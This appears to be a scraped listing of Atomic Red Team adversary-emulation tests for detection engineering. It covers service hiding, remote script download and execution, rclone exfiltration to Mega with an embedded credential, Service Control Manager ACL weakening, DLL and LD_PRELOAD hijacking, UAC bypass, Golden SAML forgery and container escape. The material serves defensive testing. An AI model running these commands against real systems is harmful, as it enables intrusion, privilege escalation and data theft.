Description: The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
Upon successful execution, sc.exe creates a new service changes the security descriptor.
https://twitter.com/Alh4zr3d/status/1580925761996828672
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
cmd /c "..\ExternalPayloads\nircmd.exe" win child class "Shell_TrayWnd" hide class "TrayClockWClass"
Description: NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account
See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
Prereq: The Nircmd executable must exist at (..\ExternalPayloads\nircmd.exe)
if (Test-Path "..\ExternalPayloads\nircmd.exe") {exit 0} else {exit 1}
Cleanup:
cmd /c "..\ExternalPayloads\nircmd.exe" win child class "Shell_TrayWnd" show class "TrayClockWClass" -erroraction silentlycontinue | out-null
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file.
The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory.
Word spawned a command shell and used an IP address in the command line
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"C:\Users\Public\art.jse`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indicator of malicious activity.
Upon execution, CMD will be launched and ping 8.8.8.8.
# Add user32.dll for keybd_event Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("user32.dll")] public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo); } "@
# Short delay for Run dialog Start-Sleep -Milliseconds 500 Add-Type -AssemblyName System.Windows.Forms [System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('calc.exe')) + "{ENTER}")
Description: Tests the **Paste and Run** technique, where users are tricked into running
malicious PowerShell commands by automating the Win+R command to open the
Run dialog and input `encoded PowerShell to execute calc.exe.`
- [Fake CAPTCHA Campaign](https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf)
- [From Clipboard to Compromise](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn)
T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
Exfiltrate data with rclone to cloud Storage - Mega (Windows)
New-Item $env:appdata\rclone -ItemType directory New-Item $env:appdata\rclone\rclone.conf cd "..\ExternalPayloads\T1567.002\rclone-v*\" .\rclone.exe config create T1567002 mega set-Content $env:appdata\rclone\rclone.conf "[T1567002] `n type = mega `n user = atomictesting@outlook.com `n pass = vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA" .\rclone.exe copy --max-size 1700k "..\ExternalPayloads\T1567.002" T1567002:test -v
Description: This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Prereq: rclone must exist at (..\ExternalPayloads\T1567.002\rclone-v*\)
if (Test-Path "..\ExternalPayloads\T1567.002\rclone-v*\") {exit 0} else {exit 1}
Description: This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Prereq: rclone must exist at (../ExternalPayloads/T1567.002/rclone-v*/)
if (Test-Path "../ExternalPayloads/T1567.002/rclone-v*/") {exit 0} else {exit 1}
Prereq: terraform must exist at (../ExternalPayloads/T1567.002/terraform-v*)
if (Test-Path "../ExternalPayloads/T1567.002/terraform-v*") {exit 0} else {exit 1}
Prereq: Must provide a valid directory or file path to exfiltrate to AWS S3
if (Test-Path "../ExternalPayloads/T1567.002/data/") {exit 0} else {exit 1}
Description: This test uses HTTP POST to exfiltrate data to a remote text storage site. (pastebin)
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it
Description: Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`
[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)
[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)
Description: Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
Will start a process on a remote host.
Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).
Prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
if (Test-Path "..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
Description: This atomic attempts to emulate the unique behavior of BlackCat ransomware prior to encryption and during Lateral Movement attempts via PsExec on Windows. Uses bundled PsExec like BlackCat
Prereq: PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
if (Test-Path "..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
Description: Requires having RemCom installed, path to RemCom is one of the input input_arguments
Will start a process on a remote host.
Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
Prereq: RemCom tool must exist on disk in the ExternalPayloads folder
if (Test-Path "..\ExternalPayloads\remcom.exe") { exit 0} else { exit 1}
T1569.002 - System Services: Service Execution
Snake Malware Service Create
sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto
Description: The following Atomic Test will create a new service named WerFaultSvc with a binary path of WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe.
This was recently seen in the Snake Malware report.
Upon execution, sc.exe will create a new service named WerFaultSvc with a bin path \WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe and a display name of WerFault Service.
[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
Cleanup:
sc.exe delete "WerFaultSvc"
T1569.002 - System Services: Service Execution
Modifying ACL of Service Control Manager via SDET
sc.exe sdset scmanager D:(A;;KA;;;WD)
Description: Modify permissions of Service Control Manager via SDSET. This allows any administrative user to escalate privilege and create a service with SYSTEM level privileges.Restart is required.
[Blog](https://0xv1n.github.io/posts/scmanager/)
T1569.002 - System Services: Service Execution
Pipe Creation - PsExec Tool Execution From Suspicious Locations
cd C:\Users\Public\Temp\ .\PsExec.exe -i -s cmd -accepteula
Description: Requires PsExec tool installed. BlackCat Ransomeware tried to propagate by creating pipe using PsExec process executing from suspicious locations (In the particular case the legitimate PsExec executable is embedded within the Windows variant and is dropped in the victim’s %TEMP% directory). pon successful execution, PsExec will be executed from suspicious location and create a new pipe to execute CMD.
Prereq: PsExec tool from Sysinternals must exist in the '\Users\Public\Temp\' directory
Description: Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
Prerequisites:
- A file server running Windows Server 2022 Datacenter: Azure Edition
- A Windows 11 computer
- Windows Admin Center
T1570 - Lateral Tool Transfer
Exfiltration Over SMB over QUIC (NET USE)
NET USE * '\\example.com\sales' /TRANSPORT:QUIC /SKIPCERTCHECK copy 'C:\path\to\file.txt' '*:\'
Description: Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
Prerequisites:
- A file server running Windows Server 2022 Datacenter: Azure Edition
- A Windows 11 computer
- Windows Admin Center
T1571 - Non-Standard Port
Testing usage of uncommonly used port with PowerShell
Description: Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful
port check will be displayed.
T1571 - Non-Standard Port
Testing usage of uncommonly used port
echo quit | telnet google.com 8081 exit 0
Description: Testing uncommonly used port utilizing telnet.
Description: This test simulates an infected host sending a large volume of DoH queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DoH queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
Description: This test simulates an infected host beaconing via DoH queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
Description: This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DoH queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DoH queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
Description: Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels.
This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc.
Reference:
- [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
Prereq: Download devtunnel
test -f ../ExternalPayloads/devtunnel
Prereq: Login to Microsoft Dev tunnels
../ExternalPayloads/devtunnel user show | grep -q "Not logged in" && exit 1 || exit 0
Cleanup:
pkill -9 $(basename "../ExternalPayloads/devtunnel") ../ExternalPayloads/devtunnel user logout rm ../ExternalPayloads/devtunnel
Description: Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port.
Reference:
- [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
Prereq: Install code-cli
which code
Prereq: Login to VSCode Dev tunnels
code tunnel user show | grep -q "not logged in" && exit 1 || exit 0
Cleanup:
pkill -9 tunnel code tunnel unregister code tunnel user logout
Description: Cloudflared can be used for exposing local development environment/services/files over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port.
Reference:
- [Cloudflared Docs](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/cloudflared/)
Prereq: Download cloudflared
test -f "../ExternalPayloads/cloudflared" && exit 0 || exit 1
Description: Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443.
Description: Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.
Cleanup:
del %APPDATA%\updater.exe >nul 2>&1 del %APPDATA%\amsi.dll >nul 2>&1
Description: .NET components (a couple of DLLs loaded anytime .NET apps are executed) when they are loaded they look for an environment variable called APPX_PROCESS
Setting the environmental variable and dropping the phantom WinAppXRT.dll in e.g. c:\windows\system32 (or any other location accessible via PATH) will ensure the
WinAppXRT.dll is loaded everytime user launches an application using .NET.
Upon successful execution, amsi.dll will be copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied to system32 folder for loading during execution of any .NET application.
Cleanup:
reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f del %windir%\System32\WinAppXRT.dll del %APPDATA%\WinAppXRT.dll
Description: Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
Print Spooler service is also configured to auto start. Reboot of system is required
Cleanup:
del %windir%\System32\ualapi.dll del %APPDATA%\ualapi.dll
T1574.001 - Hijack Execution Flow: DLL
DLL Side-Loading using the Notepad++ GUP.exe binary
"T1574.002\bin\GUP.exe"
Description: GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
Prereq: Gup.exe binary must exist on disk at specified location (T1574.002\bin\GUP.exe)
if (Test-Path "T1574.002\bin\GUP.exe") {exit 0} else {exit 1}
Cleanup:
taskkill /F /IM calculator.exe >nul 2>&1
T1574.001 - Hijack Execution Flow: DLL
DLL Side-Loading using the dotnet startup hook environment variable
set DOTNET_STARTUP_HOOKS="T1574.002\bin\preloader.dll" dotnet -h > nul echo.
Description: Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
Prereq: .Net SDK must be installed
if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1}
Prereq: preloader must exist
if (Test-Path "T1574.002\bin\preloader.dll") {exit 0} else {exit 1}
Cleanup:
taskkill /F /IM calculator.exe >nul 2>&1
T1574.001 - Hijack Execution Flow: DLL
DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
Write-Host 1.Downloading KeyScrambler from official website to temp directory Invoke-WebRequest -Uri "https://download.qfxsoftware.com/download/latest/KeyScrambler_Setup.exe" -OutFile $env:Temp\KeyScrambler_Setup.exe Write-Host 2.Installing KeyScrambler with KeyScrambler_Setup.exe from temp directory Start-Process -FilePath $env:Temp\KeyScrambler_Setup.exe -ArgumentList /S -Wait Write-Host 3.Copying KeyScrambler.exe to temp folder,to avoid permission issues, which calls KeyScramblerIE.dll in CWD i.e. temp Copy-Item "C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe" -Destination $env:TEMP\KeyScrambler.exe Write-Host 4.Executing KeyScrambler.exe, you should see a popup of missing KeyScramblerIE.dll, you can close this popup Start-Process -FilePath $env:Temp\KeyScrambler.exe Write-Host 5.A modified KeyScramblerIE.dll can be copied to temp, which can be misused by Attacker
Description: Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe", which can load further executables embedded in modified KeyScramblerIE.dll file.
Cleanup:
Write-Host 1.Kindly close the popup window asking for KeyScramblerIE.dll ,so that it gets deleted.
sudo sh -c 'echo /tmp/T1574006.so > /etc/ld.so.preload'
Description: This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload.
Prereq: The shared library must exist on disk at specified location (/tmp/T1574006.so)
if [ -f /tmp/T1574006.so ]; then exit 0; else exit 1; fi;
Cleanup:
sudo sed -i 's#/tmp/T1574006.so##' /etc/ld.so.preload
T1574.006 - Hijack Execution Flow: LD_PRELOAD
Shared Library Injection via LD_PRELOAD
LD_PRELOAD=/tmp/T1574006.so ls
Description: This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
Prereq: The shared library must exist on disk at specified location (/tmp/T1574006.so)
if [ -f /tmp/T1574006.so ]; then exit 0; else exit 1; fi;
Description: Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%\Local\Microsoft\WindowsApps and
names it Get-Variable.exe for Windows 10 and above.
https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
Description: When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability
known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe.
Cleanup:
sc stop "Example Service" >nul 2>&1 sc delete "Example Service" >nul 2>&1 del "C:\Program Files\windows_service.exe" >nul 2>&1 del "C:\program.exe" >nul 2>&1 del "C:\Time.log" >nul 2>&1
Description: Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
Description: Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
Prereq: "T1574.012\bin\T1574.012x64.dll" must be present
if (Test-Path "T1574.012\bin\T1574.012x64.dll") {exit 0} else {exit 1}
Description: Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
Prereq: "T1574.012\bin\T1574.012x64.dll" must be present
if (Test-Path "T1574.012\bin\T1574.012x64.dll") {exit 0} else {exit 1}
Description: Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
Prereq: "T1574.012\bin\T1574.012x64.dll" must be present
if (Test-Path "T1574.012\bin\T1574.012x64.dll") {exit 0} else {exit 1}
aws ec2 create-snapshot --region us-east-1 --volume-id vol-0123456789abcdef0 --description "Atomic Red Team Test Snapshot" --query "SnapshotId" --output text
Description: Creates an EBS snapshot in AWS using the AWS CLI.
This simulates an adversary duplicating volume data via snapshots for persistence or exfiltration.
Prereq: AWS CLI must be installed.
if command -v aws > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: AWS CLI must be authenticated.
if aws sts get-caller-identity --region us-east-1 > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: EBS volume must exist.
if aws ec2 describe-volumes --volume-ids vol-0123456789abcdef0 --region us-east-1 > /dev/null 2>&1; then exit 0; else exit 1; fi
Cleanup:
SNAPSHOT_ID=$(aws ec2 describe-snapshots --region us-east-1 --filters "Name=volume-id,Values=vol-0123456789abcdef0" --query "Snapshots[0].SnapshotId" --output text) if [ "$SNAPSHOT_ID" != "None" ]; then aws ec2 delete-snapshot --region us-east-1 --snapshot-id "$SNAPSHOT_ID" fi
Description: Creates a snapshot of a managed disk in Azure using the Azure CLI.
Simulates adversary snapshotting behavior for persistence or data duplication.
Prereq: Azure CLI must be installed.
if command -v az > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: Azure CLI must be authenticated.
if az account show > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: Azure disk must exist.
if az disk show --resource-group myResourceGroup --name myDiskName > /dev/null 2>&1; then exit 0; else exit 1; fi
Cleanup:
az snapshot delete --resource-group myResourceGroup --name mySnapshotName
Description: Creates a snapshot of a persistent disk in GCP using the gcloud CLI.
Emulates adversary behavior to gain access to volume data or replicate environment state.
Prereq: gcloud CLI must be installed.
if command -v gcloud > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: gcloud CLI must be authenticated.
if gcloud auth list --filter=status:ACTIVE --format="value(account)" | grep . > /dev/null; then exit 0; else exit 1; fi
Prereq: GCP disk must exist.
if gcloud compute disks describe myDiskName --zone=us-central1-a > /dev/null 2>&1; then exit 0; else exit 1; fi
Description: This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
Prereq: Stratus binary must be present at the ($T1580/src/stratus)
if test -f "$T1580/src/stratus"; then exit 0; else exit 1; fi
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
cat ~/.aws/credentials | grep "default"
Cleanup:
cd $T1580/src echo "Stratus: Start Cleanup." ./stratus cleanup aws.discovery.ec2-enumerate-from-instance echo "Removing Stratus artifacts from local machine." rm -rf stratus*
Get-CimInstance -Query "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')"
Description: Enumerate PlugNPlay Camera using powershell commandlet. this technique was seen in dcrat malware backdoor capabilities where it enumerate the camera info mounted on the compromised host. reference: https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor
Description: This test will scan a target system with a wordlist of common directories and file paths.
T1606.002 - Forge Web Credentials: SAML token
Golden SAML
Import-Module AADInternals -Force $saml = New-AADIntSAMLToken -ImmutableID "aehgdqBTZV50DKQZmNJ8mg==" -PfxFileName ".\ADFS_signing.pfx" -Issuer "http://contoso.com/adfs/services/trust/" $conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache if ($conn) { Write-Host "`nSuccessfully connected as $($conn.User)" } else { Write-Host "`nThe connection failed" } Write-Host "End of Golden SAML"
Description: Forge a "Golden SAML" token which allows to impersonate any Azure AD user, and authenticate to AADGraph (as a proof).
You will need the ADFS token signing certificate (see T1552.004 to export it).
More info here : https://o365blog.com/post/adfs/
Prereq: AADInternals module must be installed.
if (Get-Module AADInternals) {exit 0} else {exit 1}
T1609 - Kubernetes Exec Into Container
ExecIntoContainer
kubectl create -f $PathtoAtomicsFolder/T1609/src/busybox.yaml -n default # wait 3 seconds for the instance to come up sleep 3 kubectl exec -n default busybox -- uname
Description: Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”.
Description: Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“docker exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “docker exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts.
Description: Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime. They can do this using docker create and docker start commands. Kinsing & Doki was exploited using this technique.
Description: In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container.
Additional Details:
- https://twitter.com/mauilion/status/1129468485480751104
- https://securekubernetes.com/scenario_2_attack/
Prereq: Verify docker is installed.
which docker
Prereq: Verify docker service is running.
sudo systemctl status docker
Prereq: Verify kind is in the path.
which kind
Prereq: Verify kind-atomic-cluster is created
sudo kind get clusters
Prereq: Verify kubectl is in path
which kubectl
Cleanup:
kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
T1611 - Escape to Host
Mount host filesystem to escape privileged Docker container
Description: This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser.
The container running the test needs be privileged. It may take up to a minute for this to run due to how often crond triggers a job.
Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell.
Prereq: Verify mount is installed.
which mount
Prereq: Verify container is privileged.
capsh --print | grep cap_sys_admin
Prereq: Verify mount device (/dev/dm-0) exists.
ls /dev/dm-0
Prereq: Netcat is installed.
which netcat
Prereq: IP Address is known.
if [ "`ifconfig eth0 | grep inet | awk '{print $2}'`" != "" ]; then echo "Listen address set as `ifconfig eth0 | grep inet | awk '{print $2}'`" ; fi
Description: This test demonstrates privilege escalation by abusing Docker's volume mapping
feature to gain access to the host file system. By mounting the root directory
of the host into a Docker container, the attacker can use chroot to operate as
root on the host system.
Prereq: Docker
command -v docker &> /dev/null && echo "Docker is installed" || { echo "Docker is not installed."; exit 1; }
Description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
Description: Identify System language by querying the registry on an endpoint.
Upon successful execution, result in number format can be looked up to correlate the language.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with chcp
chcp
Description: Identify System language with the chcp command.
Upon successful execution, result in number format can be looked up to correlate the language.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with locale
locale
Description: Identify System language with the `locale` command.
Upon successful execution, the output will contain the environment variables that indicate
the 5 character locale that can be looked up to correlate the language and territory.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with localectl
localectl status
Description: Identify System language with the `localectl` command.
Upon successful execution, the key `System Locale` from the output will contain the
`LANG` environment variable that has the 5 character locale result that can be looked
up to correlate the language and territory.
T1614.001 - System Location Discovery: System Language Discovery
Description: Identify System language with the by reading the locale configuration file.
The locale configuration file contains the `LANG` environment variable which
will contain the 5 character locale that can be looked up to correlate the
language and territory.
Prereq: Check the location of the locale configuration file.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language by Environment Variable Query
env | grep LANG printenv LANG set | grep LANG
Description: Identify System language by checking the environment variables
Upon successful execution, the 5 character locale result can be looked up to
correlate the language and territory. Environment query commands are likely
to run with a pattern match command e.g. `env | grep LANG`
Note: `env` and `printenv` will usually provide the same results. `set` is
also used as a builtin command that does not generate syscall telemetry but
does provide a list of the environment variables.
Prereq: Check if printenv command exists on the machine
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with dism.exe
dism.exe /online /Get-Intl
Description: The Windows utility DISM (Deployment Image Servicing and Management) can be used to display information about international settings and languages on the currently installed Windows image using an elevated terminal.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language by Windows API Query
..\ExternalPayloads\LanguageKeyboardLayout.exe
Description: This test executes a custom script called LanguageKeyboardLayout.exe which outputs the values of the following Windows API functions to the user terminal:
`GetKeyboardLayout`, `GetKeyboardLayoutList`, `GetUserDefaultUILanguage`, `GetSystemDefaultUILanguage`, `GetUserDefaultLangID`.
Documentation for these functions is located [here](https://learn.microsoft.com/en-us/windows/win32/api/winuser/).
Prereq: LanguageKeyboardLayout.exe must exist on disk (default location: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe)
if (Test-Path "..\ExternalPayloads\LanguageKeyboardLayout.exe") {exit 0} else {exit 1}
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with WMIC
wmic /node:localhost os get Locale,OSLanguage,MUILanguages /format:table
Description: WMIC (Windows Management Instrumentation Command-line) is a command-line tool that provides a simplified interface to query and manage Windows system configurations, processes, and hardware information using WMI.
The command in this test retrieves information about the system's locale, operating system language, and multilingual user interface (MUI) languages.
T1614.001 - System Location Discovery: System Language Discovery
Description: This PowerShell script collects key system settings, such as the UI language, user language preferences, system locale, current culture, UI culture, and time zone, into a hash table.
It then outputs these settings in a readable key-value format directly to the terminal. The script is simple and efficient for quickly displaying system configuration details.
T1614 - System Location Discovery
Get geolocation info through IP-Lookup services using curl Windows
Description: Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
Prereq: Curl must be installed on system.
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
T1614 - System Location Discovery
Get geolocation info through IP-Lookup services using curl freebsd, linux or macos
curl -k https://ipinfo.io/
Description: Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
T1615 - Group Policy Discovery
Display group policy information via gpresult
gpresult /z
Description: Uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer
The /z parameter displays all available information about Group Policy. More parameters can be found in the linked Microsoft documentation
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/
Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
T1615 - Group Policy Discovery
Get-DomainGPO to display group policy information via PowerView
